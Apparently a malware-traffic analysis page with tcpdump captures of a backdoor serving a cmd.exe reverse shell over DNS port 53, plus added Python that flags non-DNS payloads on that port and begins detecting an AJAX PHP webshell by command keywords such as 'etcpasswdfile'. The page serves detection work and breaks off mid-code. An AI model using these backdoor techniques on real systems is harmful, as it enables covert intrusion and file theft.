2015-05-19 23:00:55.094954 IP 192.168.1.101.41971 > 193.0.200.131.35689: Flags [S], seq 3563735941, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4_.@…O….e…….i.jK……….7…………..
2015-05-19 23:00:58.093473 IP 192.168.1.101.41971 > 193.0.200.131.35689: Flags [S], seq 3563735941, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4`k@…N….e…….i.jK……….7…………..
2015-05-19 23:01:04.095993 IP 192.168.1.101.41971 > 193.0.200.131.35689: Flags [S], seq 3563735941, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0b}@…L….e…….i.jK…..p….@……….
2015-05-19 23:01:18.095228 IP 192.168.1.101.41998 > 193.0.200.131.35689: Flags [S], seq 2707094062, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4d.@…JA…e…….i.Z……….X……………
2015-05-19 23:01:21.093621 IP 192.168.1.101.41998 > 193.0.200.131.35689: Flags [S], seq 2707094062, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4e.@…I|…e…….i.Z……….X……………
2015-05-19 23:01:27.098049 IP 192.168.1.101.41998 > 193.0.200.131.35689: Flags [S], seq 2707094062, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0gQ@…G….e…….i.Z……p…l………..
2015-05-19 23:01:41.099272 IP 192.168.1.101.42025 > 193.0.200.131.35689: Flags [S], seq 2645781356, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4h.@…F[…e…..).i..kl……………………
2015-05-19 23:01:44.099687 IP 192.168.1.101.42025 > 193.0.200.131.35689: Flags [S], seq 2645781356, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4i,@…F….e…..).i..kl……………………
2015-05-19 23:01:50.098133 IP 192.168.1.101.42025 > 193.0.200.131.35689: Flags [S], seq 2645781356, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0ix@…E….e…..).i..kl….p……………
2015-05-19 23:02:04.104657 IP 192.168.1.101.42029 > 193.0.200.131.35689: Flags [S], seq 2325464383, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4i.@…Ev…e…..-.i…?……………………
2015-05-19 23:02:07.119976 IP 192.168.1.101.42029 > 193.0.200.131.35689: Flags [S], seq 2325464383, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4i.@…E^…e…..-.i…?……………………
2015-05-19 23:02:13.117210 IP 192.168.1.101.42029 > 193.0.200.131.35689: Flags [S], seq 2325464383, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0i.@…EH…e…..-.i…?….p……………
2015-05-19 23:02:27.128453 IP 192.168.1.101.42030 > 193.0.200.131.35689: Flags [S], seq 3243784780, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…E….e…….i.X:L………G…………..
2015-05-19 23:02:30.135843 IP 192.168.1.101.42030 > 193.0.200.131.35689: Flags [S], seq 3243784780, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j”@…E….e…….i.X:L………G…………..
2015-05-19 23:02:36.145058 IP 192.168.1.101.42030 > 193.0.200.131.35689: Flags [S], seq 3243784780, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0j@@…D….e…….i.X:L….p….Q……….
2015-05-19 23:02:50.141196 IP 192.168.1.101.42033 > 193.0.200.131.35689: Flags [S], seq 234299550, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4jj@…D….e…..1.i.. ……….T…………..
2015-05-19 23:02:53.142717 IP 192.168.1.101.42033 > 193.0.200.131.35689: Flags [S], seq 234299550, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…D….e…..1.i.. ……….T…………..
2015-05-19 23:02:59.142926 IP 192.168.1.101.42033 > 193.0.200.131.35689: Flags [S], seq 234299550, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0j.@…D{…e…..1.i.. …..p….]……….
2015-05-19 23:03:13.147235 IP 192.168.1.101.42034 > 193.0.200.131.35689: Flags [S], seq 2811646036, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…D^…e…..2.i..PT……………………
2015-05-19 23:03:16.153598 IP 192.168.1.101.42034 > 193.0.200.131.35689: Flags [S], seq 2811646036, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4j.@…DX…e…..2.i..PT……………………
2015-05-19 23:03:22.165817 IP 192.168.1.101.42034 > 193.0.200.131.35689: Flags [S], seq 2811646036, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0j.@…DU…e…..2.i..PT….p……………
2015-05-19 23:03:36.174000 IP 192.168.1.101.42036 > 193.0.200.131.35689: Flags [S], seq 3352231349, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4k @…D)…e…..4.i………….b…………..
2015-05-19 23:03:39.174474 IP 192.168.1.101.42036 > 193.0.200.131.35689: Flags [S], seq 3352231349, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4k%@…D….e…..4.i………….b…………..
2015-05-19 23:03:45.178704 IP 192.168.1.101.42036 > 193.0.200.131.35689: Flags [S], seq 3352231349, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0k1@…D….e…..4.i……..p…Bk……….
2015-05-19 23:03:59.186950 IP 192.168.1.101.42037 > 193.0.200.131.35689: Flags [S], seq 647074179, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4kL@…C….e…..5.i&………..;……………
2015-05-19 23:04:02.188369 IP 192.168.1.101.42037 > 193.0.200.131.35689: Flags [S], seq 647074179, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4kX@…C….e…..5.i&………..;……………
2015-05-19 23:04:08.180587 IP 192.168.1.101.42037 > 193.0.200.131.35689: Flags [S], seq 647074179, win 65535, options [mss 1460,nop,nop,sackOK], length 0

Weird DNS Malware NS Based Reverse Command Line Shell Backdoor Trojan

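An added example, mine and not from the original post, for the capture that follows. What the capture shows: 192.168.1.3 connects to TCP/53 on 192.168.1.2, and the first 88 bytes back are the cmd.exe banner, "Microsoft Windows XP [Version 5.1.2600] ... C:\>", followed by "dir" typed from .3 and a directory listing of C:\ in return. Because the port is 53, tcpdump hands every segment to its DNS printer, which is why the summary lines end in "[|domain]" and print nonsense record counts and lengths; any port-keyed decoder, flow tool or IDS does the same, and that is the point of putting a shell on 53. The frames are 802.11 data frames (tcpdump labels them "ethertype Unknown (0x2452)"), so the -X dump starts with the 24-byte MAC header, then what looks like a 4-byte IV/key-index field (the Protected bit is set in frame control 0x0841), then LLC/SNAP and the IPv4 header. The script parses the -X hex lines of the banner segment (copied from the capture, ASCII column omitted), locates IPv4 by the SNAP ethertype rather than a fixed offset, decodes IP and TCP, and then asks the one question a port-keyed decoder never asks: does the payload satisfy DNS-over-TCP framing (RFC 1035 section 4.2.2: a two-byte length prefix that matches, a sane opcode and question count)? It assumes one DNS message per segment; the www.www.com query used as the contrast case is constructed by me from the name queried in the capture.

```python
"""Decode a tcpdump -X dump and flag non-DNS payloads on TCP/53.

Added example, not code from the original post. Assumes 802.11 frames carrying
LLC/SNAP (as in this capture) or a plain Ethernet capture whose link header
tcpdump has already stripped, and one whole DNS message per TCP segment.
"""
import re
import struct

# Copied from the capture below (ASCII column omitted): the segment from
# 192.168.1.2:53 to 192.168.1.3:1396 that carries the cmd.exe banner.
SHELL_BANNER_DUMP = """
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332
0x0010: 000e 3578 0c02 8003 dafc f700 aaaa 0300
0x0020: 0000 0800 4500 0080 07cd 4000 4006 af55
0x0030: c0a8 0102 c0a8 0103 0035 0574 bd0f 2fed
0x0040: 23c5 33c0 5018 ffff 4e14 0000 4d69 6372
0x0050: 6f73 6f66 7420 5769 6e64 6f77 7320 5850
0x0060: 205b 5665 7273 696f 6e20 352e 312e 3236
0x0070: 3030 5d0d 0a28 4329 2043 6f70 7972 6967
0x0080: 6874 2031 3938 352d 3230 3031 204d 6963
0x0090: 726f 736f 6674 2043 6f72 702e 0d0a 0d0a
0x00a0: 433a 5c3e 611e 6bb9
"""

SNAP_IPV4 = bytes.fromhex("aaaa030000000800")   # LLC/SNAP, ethertype 0x0800
HEX_GROUP = re.compile(r"^[0-9a-fA-F]{2}([0-9a-fA-F]{2})?$")


def hexdump_to_bytes(dump):
    """tcpdump -X lines ("0x0010: 0800 4500 ...  ascii") -> raw bytes.
    Takes at most eight 16-bit groups per line; the ASCII column is dropped."""
    out = bytearray()
    for line in dump.splitlines():
        m = re.match(r"\s*0x[0-9a-fA-F]{4}:\s*(.*)$", line)
        if not m:
            continue
        groups = 0
        for tok in m.group(1).split():
            if groups == 8 or not HEX_GROUP.match(tok):
                break
            out += bytes.fromhex(tok)
            groups += 1
    return bytes(out)


def find_ipv4(frame):
    """Offset of the IPv4 header: 0 when the dump already starts with it,
    otherwise just past the LLC/SNAP header of an 802.11 data frame."""
    if len(frame) >= 20 and frame[0] >> 4 == 4 and (frame[0] & 0x0F) >= 5:
        return 0
    i = frame.find(SNAP_IPV4)
    if i < 0:
        raise ValueError("no IPv4 header found")
    return i + len(SNAP_IPV4)


def parse_tcp(frame):
    """Minimal IPv4 + TCP decode; returns addresses, ports, flags and payload."""
    ip = frame[find_ipv4(frame):]
    if ip[0] >> 4 != 4 or ip[9] != 6:
        raise ValueError("not IPv4/TCP")
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]                       # drops trailing ICV/FCS bytes
    sport, dport, seq, ack = struct.unpack("!HHII", tcp[:12])
    doff = (tcp[12] >> 4) * 4
    return {"src": ".".join(map(str, ip[12:16])), "sport": sport,
            "dst": ".".join(map(str, ip[16:20])), "dport": dport,
            "seq": seq, "ack": ack, "flags": tcp[13], "payload": tcp[doff:]}


def looks_like_dns_over_tcp(payload):
    """RFC 1035 4.2.2 framing: 2-byte length prefix, then a header whose opcode
    and question count are plausible. One message per segment is assumed."""
    if len(payload) < 14:
        return False
    if struct.unpack("!H", payload[:2])[0] != len(payload) - 2:
        return False
    flags, qdcount = struct.unpack("!HH", payload[4:8])
    return ((flags >> 11) & 0xF) in (0, 1, 2) and 1 <= qdcount <= 16


def classify_port53(pkt):
    """Verdict for a segment on port 53, from the payload rather than the port."""
    if 53 not in (pkt["sport"], pkt["dport"]):
        return "not-port-53"
    p = pkt["payload"]
    if not p:
        return "no-payload"
    if looks_like_dns_over_tcp(p):
        return "dns"
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in p) / len(p)
    return "cleartext-non-dns" if printable > 0.9 else "binary-non-dns"


def dns_tcp_query(name, qtype=1, txid=0x1234):
    """Constructed DNS-over-TCP query, used only for the contrast case."""
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    msg = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)
    return struct.pack("!H", len(msg)) + msg


if __name__ == "__main__":
    pkt = parse_tcp(hexdump_to_bytes(SHELL_BANNER_DUMP))
    print(f"{pkt['src']}:{pkt['sport']} -> {pkt['dst']}:{pkt['dport']} "
          f"{len(pkt['payload'])} bytes: {classify_port53(pkt)}")
    print(pkt["payload"].decode("ascii", "replace"))
```

On the banner segment this decodes 192.168.1.2:53 -> 192.168.1.3:1396, PSH+ACK, 88 bytes of payload whose first two bytes "Mi" (0x4d69) are nowhere near a valid length prefix, so the verdict is cleartext-non-dns; the constructed www.www.com query passes. The length-prefix check is the cheap one to put in a sensor, but it is not sufficient on its own: a DNS tunnel that keeps valid framing will pass it, and a segment carrying half a large response will fail it, which is why a production check reassembles the stream and validates whole messages.
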
2005-01-13 21:50:16.484263 ARP, Request who-has 192.168.1.1 tell 192.168.1.3, length 46
……….5x…………………………….
2005-01-13 21:50:16.501471 IP 192.168.1.3.1393 > 192.168.1.1.53: 1+ PTR? 1.1.168.192.in-addr.arpa. (42)
E..F…….K………q.5.2……………1.1.168.192.in-addr.arpa…..
2005-01-13 21:50:16.501497 ARP, Reply 192.168.1.1 is-at 00:90:d0:eb:46:e7, length 28
…………F…….5x……
2005-01-13 21:50:16.504144 IP 192.168.1.1.53 > 192.168.1.3.1393: 1* 1/0/0 PTR SpeedTouch.lan. (70)
E..b …@…………5.q.N……………1.1.168.192.in-addr.arpa……………..
SpeedTouch.lan.
2005-01-13 21:50:16.580303 00:0e:35:78:0c:02 > ff:ff:ff:ff:ff:ff, ethertype Unknown (0x2452), length 82:
0x0000: 0842 0000 ffff ffff ffff 0010 c630 6bb3 .B………..0k.
0x0010: 000e 3578 0c02 a07f 5fd2 1700 aaaa 0300 ..5x…._…….
0x0020: 0000 0806 0001 0800 0604 0001 000e 3578 …………..5x
0x0030: 0c02 c0a8 0103 0000 0000 0000 c0a8 0101 …………….
0x0040: 202a 4a8e .*J.
.B………..0k…5x…._…………………5x……………. *J.
2005-01-13 21:50:17.600303 00:90:d0:eb:46:e7 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 96:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 0090 d0eb 46e7 9001 6615 8300 aaaa 0300 ….F…f…….
0x0020: 0000 0800 4500 002a 07b8 4000 4006 e73d ….E..*..@.@..=
0x0030: c0a8 0102 8c70 fdbd 0402 584c 5329 354d …..p….XLS)5M
0x0040: 51b9 b5af 5018 f904 f6f8 0000 87c6 a2af Q…P………..
0x0050: 538a S.
.A…..0k…H$32….F…f………..E..*..@.@..=…..p….XLS)5MQ…P………..S.
2005-01-13 21:50:19.113417 IP 192.168.1.3.1394 > 192.168.1.1.53: 2+ A? www.www.com.lan. (33)
E..=…….S………r.5.)……………www.www.com.lan…..
2005-01-13 21:50:19.131199 IP 192.168.1.1.53 > 192.168.1.3.1394: 2 0/0/0 (33)
E..= …@…………5.r.)%…………..www.www.com.lan…..
2005-01-13 21:50:19.132818 IP 192.168.1.3.1395 > 192.168.1.1.53: 3+ A? www.www.com. (29)
E..9. …..V………s.5.%
…………..www.www.com…..
2005-01-13 21:50:19.442482 IP 192.168.1.1.53 > 192.168.1.3.1395: 3 1/0/0 A 63.215.91.200 (45)
E..I …@…………5.s.5……………www.www.com……………..?.[.
2005-01-13 21:50:41.962974 ARP, Request who-has 192.168.1.2 tell 192.168.1.3, length 46
……….5x…………………………….
2005-01-13 21:50:41.975819 00:0e:35:78:0c:02 > ff:ff:ff:ff:ff:ff, ethertype Unknown (0x2452), length 82:
0x0000: 0842 0000 ffff ffff ffff 0010 c630 6bb3 .B………..0k.
0x0010: 000e 3578 0c02 6090 71d2 1700 aaaa 0300 ..5x..`.q…….
0x0020: 0000 0806 0001 0800 0604 0001 000e 3578 …………..5x
0x0030: 0c02 c0a8 0103 0000 0000 0000 c0a8 0102 …………….
0x0040: 9a7b 4317 .{C.
.B………..0k…5x..`.q…………………5x……………..{C.
2005-01-13 21:50:41.976748 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 82:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 6003 e408 f700 aaaa 0300 ..5x..`………
0x0020: 0000 0806 0001 0800 0604 0002 0080 4824 …………..H$
0x0030: 3332 c0a8 0102 000e 3578 0c02 c0a8 0103 32……5x……
0x0040: 461f 4b55 F.KU
.A…..0k…H$32..5x..`…………………..H$32……5x……F.KU
2005-01-13 21:50:41.977621 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [S], seq 600126399, win 16384, options [mss 1460,nop,nop,sackOK], length 0
E..0.
@…bh………t.5#.3…..p.@.b………..
2005-01-13 21:50:41.977640 ARP, Reply 192.168.1.2 is-at 00:80:48:24:33:32, length 28
……….H$32……5x……
2005-01-13 21:50:41.979157 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 102:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 8090 73d2 1700 aaaa 0300 ..5x….s…….
0x0020: 0000 0800 4500 0030 150a 4000 8006 6268 ….E..0..@…bh
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33bf ………t.5#.3.
0x0040: 0000 0000 7002 4000 629c 0000 0204 05b4 ….p.@.b…….
0x0050: 0101 0402 60ba 5f93 ….`._.
.B….H$32…0k…5x….s………..E..0.
@…bh………t.5#.3…..p.@.b………..`._.
2005-01-13 21:50:41.980806 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 102:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 7003 b218 f700 aaaa 0300 ..5x..p………
0x0020: 0000 0800 4500 0030 07cc 4000 4006 afa6 ….E..0..@.@…
0x0030: c0a8 0102 c0a8 0103 0035 0574 bd0f 2fec ………5.t../.
0x0040: 23c5 33c0 7012 ffff b597 0000 0204 05ac #.3.p………..
0x0050: 0101 0402 cda6 8698 ……..
2005-01-13 21:50:41.983172 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 94:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 a090 75d2 1700 aaaa 0300 ..5x….u…….
0x0020: 0000 0800 4500 0028 150b 4000 8006 626f ….E..(..@…bo
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c0 ………t.5#.3.
0x0040: bd0f 2fed 5010 4410 9e43 0000 92b4 4166 ../.P.D..C….Af
.B….H$32…0k…5x….u………..E..(..@…bo………t.5#.3…/.P.D..C….Af
2005-01-13 21:50:42.039309 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 182:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 8003 dafc f700 aaaa 0300 ..5x…………
0x0020: 0000 0800 4500 0080 07cd 4000 4006 af55 ….E…..@.@..U
0x0030: c0a8 0102 c0a8 0103 0035 0574 bd0f 2fed ………5.t../.
0x0040: 23c5 33c0 5018 ffff 4e14 0000 4d69 6372 #.3.P…N…Micr
0x0050: 6f73 6f66 7420 5769 6e64 6f77 7320 5850 osoft.Windows.XP
0x0060: 205b 5665 7273 696f 6e20 352e 312e 3236 .[Version.5.1.26
0x0070: 3030 5d0d 0a28 4329 2043 6f70 7972 6967 00]..(C).Copyrig
0x0080: 6874 2031 3938 352d 3230 3031 204d 6963 ht.1985-2001.Mic
0x0090: 726f 736f 6674 2043 6f72 702e 0d0a 0d0a rosoft.Corp…..
0x00a0: 433a 5c3e 611e 6bb9 C:\>a.k.
.A…..0k…H$32..5x…………….E…..@.@..U………5.t../.#.3.P…N…Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>a.k.
2005-01-13 21:50:42.040365 IP 192.168.1.2.53 > 192.168.1.3.1396: Flags [P.], seq 1:89, ack 1, win 65535, length 8825458 updateMA+% [b2&3=0x6f73] [29728a] [28518q] [22377n] [28260au][|domain]
E…..@.@..U………5.t../.#.3.P…N…Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>
2005-01-13 21:50:42.182595 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [.], ack 89, win 17336, length 0
E..(..@…bn………t.5#.3…0EP.C..C……..
2005-01-13 21:50:42.200502 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 94:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 e090 77d2 1700 aaaa 0300 ..5x….w…….
0x0020: 0000 0800 4500 0028 150c 4000 8006 626e ….E..(..@…bn
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c0 ………t.5#.3.
0x0040: bd0f 3045 5010 43b8 9e43 0000 731e 84d2 ..0EP.C..C..s…
.B….H$32…0k…5x….w………..E..(..@…bn………t.5#.3…0EP.C..C..s…
2005-01-13 21:50:44.334418 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [P.], seq 1:5, ack 89, win 17336, length 4[|domain]
E..,..@…bi………t.5#.3…0EP.C…..dir
..
2005-01-13 21:50:44.351385 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 98:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 4092 78d2 1700 aaaa 0300 ..5x..@.x…….
0x0020: 0000 0800 4500 002c 150d 4000 8006 6269 ….E..,..@…bi
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c0 ………t.5#.3.
0x0040: bd0f 3045 5018 43b8 c7c3 0000 6469 720a ..0EP.C…..dir.
0x0050: 1e86 8ed7 ….
.B….H$32…0k…5x..@.x………..E..,..@…bi………t.5#.3…0EP.C…..dir
2005-01-13 21:50:44.369608 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 295:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 9003 368b 1b00 aaaa 0300 ..5x….6…….
0x0020: 0000 0800 4500 00f1 07ce 4000 4006 aee3 ….E…..@.@…
0x0030: c0a8 0102 c0a8 0103 0035 0574 bd0f 3045 ………5.t..0E
0x0040: 23c5 33c4 5018 fffb 4f3b 0000 6469 720d #.3.P…O;..dir.
0x0050: 0a20 566f 6c75 6d65 2069 6e20 6472 6976 ..Volume.in.driv
0x0060: 6520 4320 6861 7320 6e6f 206c 6162 656c e.C.has.no.label
0x0070: 2e0d 0a20 566f 6c75 6d65 2053 6572 6961 ….Volume.Seria
0x0080: 6c20 4e75 6d62 6572 2069 7320 4646 3437 l.Number.is.FF47
0x0090: 2d38 3045 420d 0a0d 0a20 4469 7265 6374 -80EB…..Direct
0x00a0: 6f72 7920 6f66 2043 3a5c 0d0a 0d0a 3031 ory.of.C:\….01
0x00b0: 2f31 322f 3230 3035 2020 3131 3a35 3920 /12/2005..11:59.
0x00c0: 414d 2020 2020 2020 2020 2020 2020 2020 AM…………..
0x00d0: 2020 2030 2061 6965 7272 6f72 6c6f 672e …0.aierrorlog.
0x00e0: 7478 740d 0a30 312f 3139 2f32 3030 3420 txt..01/19/2004.
0x00f0: 2030 393a 3435 2050 4d20 2020 2020 2020 .09:45.PM…….
0x0100: 2020 2020 2020 2020 2020 3020 4155 544f ……….0.AUTO
0x0110: 4558 4543 2e35 1c73 2c EXEC.5.s,
2005-01-13 21:50:44.370919 IP 192.168.1.2.53 > 192.168.1.3.1396: Flags [P.], seq 89:290, ack 5, win 65531, length 20129197 inv_q [b2&3=0xa20] [22127q] [27765a] [28005n] [8297au][|domain]
dir
Volume in drive C has no label.
Volume Serial Number is FF47-80EB

Directory of C:\

01/12/2005 11:59 AM 0 aierrorlog.txt
01/19/2004 09:45 PM 0 AUTOEXEC.
2005-01-13 21:50:44.485905 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [.], ack 290, win 17135, length 0
2005-01-13 21:50:44.502308 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 94:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 7092 7ad2 1700 aaaa 0300 ..5x..p.z…….
0x0020: 0000 0800 4500 0028 150e 4000 8006 626c ….E..(..@…bl
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c4 ………t.5#.3.
0x0040: bd0f 310e 5010 42ef 9e3f 0000 d248 fe3f ..1.P.B..?…H.?
2005-01-13 21:50:44.505662 00:0e:35:78:0c:02 > 00:10:c6:30:6b:b3, ethertype Unknown (0x2452), length 1105:
0x0000: 0841 0201 0010 c630 6bb3 0080 4824 3332 .A…..0k…H$32
0x0010: 000e 3578 0c02 a003 289c 1d00 aaaa 0300 ..5x….(…….
0x0020: 0000 0800 4500 041b 07cf 4000 4006 abb8 ….E…..@.@…
0x0030: c0a8 0102 c0a8 0103 0035 0574 bd0f 310e ………5.t..1.
0x0040: 23c5 33c4 5018 fffb 1d45 0000 4241 540d #.3.P….E..BAT.
0x0050: 0a30 312f 3139 2f32 3030 3420 2030 393a .01/19/2004..09:
0x0060: 3435 2050 4d20 2020 2020 2020 2020 2020 45.PM………..
0x0070: 2020 2020 2020 3020 434f 4e46 4947 2e53 ……0.CONFIG.S
0x0080: 5953 0d0a 3036 2f32 362f 3230 3034 2020 YS..06/26/2004..
0x0090: 3132 3a31 3220 504d 2020 2020 3c44 4952 12:12.PM….<DIR
0x00a0: 3e20 2020 2020 2020 2020 2044 6f63 756d >……….Docum
0x00b0: 656e 7473 2061 6e64 2053 6574 7469 6e67 ents.and.Setting
0x00c0: 730d 0a30 322f 3033 2f32 3030 3520 2031 s..02/03/2005..1
0x00d0: 313a 3430 2050 4d20 2020 203c 4449 523e 1:40.PM….<DIR>
0x00e0: 2020 2020 2020 2020 2020 4561 7379 426f ……….EasyBo
0x00f0: 6f74 0d0a 3032 2f32 392f 3230 3034 2020 ot..02/29/2004..
0x0100: 3032 3a35 3120 504d 2020 2020 2020 2020 02:51.PM……..
0x0110: 2020 2020 3131 2c35 3331 2069 6e73 7461 ….11,531.insta
0x0120: 6c6c 6572 2d64 6562 7567 2e74 7874 0d0a ller-debug.txt..
0x0130: 3132 2f31 392f 3230 3034 2020 3132 3a35 12/19/2004..12:5
0x0140: 3020 414d 2020 2020 3c44 4952 3e20 2020 0.AM….<DIR>…
0x0150: 2020 2020 2020 206d 6761 0d0a 3132 2f31 …….mga..12/1
0x0160: 392f 3230 3034 2020 3132 3a35 3120 414d 9/2004..12:51.AM
0x0170: 2020 2020 3c44 4952 3e20 2020 2020 2020 ….<DIR>…….
0x0440: 73ac 58 s.X
2005-01-13 21:50:44.508420 IP 192.168.1.2.53 > 192.168.1.3.1396: Flags [P.], seq 290:1301, ack 5, win 65531, length 101121517 inv_q% [b2&3=0xa30] [12591q] [12601a] [12082n] [12336au][|domain]
BAT
01/19/2004 09:45 PM 0 CONFIG.SYS
06/26/2004 12:12 PM <DIR> Documents and Settings
02/03/2005 11:40 PM <DIR> EasyBoot
02/29/2004 02:51 PM 11,531 installer-debug.txt
12/19/2004 12:50 AM <DIR> mga
12/19/2004 12:51 AM <DIR> mgafold
11/24/2004 07:47 PM <DIR> mnt
10/07/2004 10:01 AM <DIR> movie
06/26/2004 01:03 PM <DIR> My Downloads
01/13/2005 10:52 PM <DIR> Program Files
01/04/2005 10:27 AM <DIR> quarantine
04/19/2004 09:57 PM 7,241 s37g
10/31/2004 08:36 PM 0 s3fs
06/02/2004 08:54 PM 123 systemscandata.txt
08/08/2004 10:48 AM <DIR> Temp
12/12/2004 02:24 PM 94,135,944 temp.mpg
01/13/2005 06:10 PM <DIR> WINDOWS
11/20/2004 09:27 AM <DIR> WUTemp
8 File(s) 94,154,839 bytes
12 Dir(s) 7,145,897,984 bytes free

C:\>
2005-01-13 21:50:44.686211 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [.], ack 1301, win 16124, length 0
2005-01-13 21:50:44.702807 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 94:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 b092 7cd2 1700 aaaa 0300 ..5x….|…….
0x0020: 0000 0800 4500 0028 150f 4000 8006 626b ….E..(..@…bk
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c4 ………t.5#.3.
0x0040: bd0f 3501 5010 3efc 9e3f 0000 e419 f48f ..5.P.>..?……
2005-01-13 21:50:47.268247 IP 192.168.1.3.1396 > 192.168.1.2.53: Flags [P.], seq 5:10, ack 1301, win 16124, length 5[|domain]
exit
2005-01-13 21:50:47.284740 00:0e:35:78:0c:02 > 00:80:48:24:33:32, ethertype Unknown (0x2452), length 99:
0x0000: 0842 0201 0080 4824 3332 0010 c630 6bb3 .B….H$32…0k.
0x0010: 000e 3578 0c02 7094 7dd2 1700 aaaa 0300 ..5x..p.}…….
0x0020: 0000 0800 4500 002d 1510 4000 8006 6265 ….E..-..@…be
0x0030: c0a8 0103 c0a8 0102 0574 0035 23c5 33c4 ………t.5#.3.
0x0040: bd0f 3501 5018 3efc c545 0000 6578 6974 ..5.P.>..E..exit
0x0050: 0a19 a578 f8 …x.

AJAX php Webshell Backdoor Trojan Sample PCAP Traffic Output

Interesting: you don't see the /etc/passwd file, or any other file requested through the webshell, in the traffic; the shell writes the output into a form box inside its own page, which makes IDS detection hard.

The detection ratio for this PHP backdoor is less than 10%.
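
That observation is worth turning into detection logic: the commands travel in the request (the runcmd= parameter and the POST fields visible in the capture), while the results come back inside the shell's own gzip-compressed page. The Python below is an added example, not code from the original post; the request lines and parameter names are taken from the capture, but the shell's HTML output (a textarea form box) is constructed here, since the capture only holds the compressed body.

```python
"""Request-side detection for the ajaxphp.php webshell traffic on this page.

Added example, not code from the original post.  The request lines and
parameter names are taken from the capture; the shell's HTML output (a
<textarea> form box) is constructed here, since the capture only holds
the gzip-compressed body.
"""
import gzip
import re
from urllib.parse import parse_qs, urlsplit

# Command words seen as runcmd=... (or as a bare ?savefile) in the capture.
WEBSHELL_COMMANDS = {"etcpasswdfile", "upload", "listdir", "savefile"}
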